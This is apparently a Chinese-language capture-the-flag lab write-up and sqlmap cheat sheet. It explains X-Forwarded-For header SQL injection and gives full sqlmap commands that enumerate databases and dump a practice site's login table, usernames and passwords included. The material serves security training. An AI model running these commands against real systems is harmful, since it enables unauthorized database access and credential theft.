sqlmap的參數:
sqlmap -r 1.txt --batch -D webcalendar -T logins -C "loginip,logintime,username,password,status" --dump http://219.153.49.228:43259
- -r **.txt 從一個文件中載入HTTP請求。
- --batch 從不詢問用戶輸入,使用所有默認配置。
- -D 庫名 要進行枚舉的指定數據庫名
- -T 表名 要進行枚舉的指定數據庫表(如:-T tablename –columns)
- -C 列名 要進行枚舉的數據庫列
- --dump 轉儲數據庫管理系統的數據庫中的表項
- --dbs 枚舉數據庫管理系統數據庫
- --current-db 檢索網站當前數據庫
- --users 檢索所有數據庫用戶
- --current-user 檢索當前數據庫用戶
指定參數進行掃描,而不是掃描所有參數,這樣可以避免浪費時間到非注入點參數上,從而提高掃描效率。比如掃描以下URL,已知Submit是靜態參數,id是動態的,那么在掃描的時候只需要指定id就行了,指定多個參數時用雙引號包起來,並以逗號分隔。也可以指定HTTP請求頭中的參數,如User-Agent
python sqlmap.py -r d:\3.txt --level 2 -p KeyWord
指定數據庫和版本
python sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --dbms mysql 5.0 --current-db
sqlmap成功后會在該目錄下生成ip命名的文件夾 root@kali:~/.sqlmap/output/ip
X-Forwarded-For也稱作XFF,是在http頭中的一個參數
X-Forwarded-For(XFF)是用來識別通過HTTP代理或負載均衡方式連接到Web服務器的客戶端最原始的IP地址的HTTP請求頭字段。
1、任務介紹
2、漏洞頁面
3、提交任意信息看看結果,提示ip已記錄,證明此處與數據庫有交互
4、添加XFF參數,提交任意數據看看:
可正常提交,存在XFF注入漏洞:
用1.1.1.1的ip構造http文件,使用sqlmap -r 1.txt --dbs --batch http://219.153.49.228:45804,跑不出來庫,后來用的*號才可以(ps:這里不是很懂,為什么用*號就可以跑出來了)
用1.1.1.1跑不出來
換*號后,跑出兩個數據庫和payload:
用sqlmap -r 11.txt -D webcalendar --tables --batch http://219.153.49.228:45804跑出表名
繼續跑字段和內容:
用戶名和口令已出來:
登錄后獲取flag
參考:
Sqlmap使用教程【個人筆記精華整理】_數據庫_TT小子的博客-CSDN博客(參數介紹很詳細全面!!)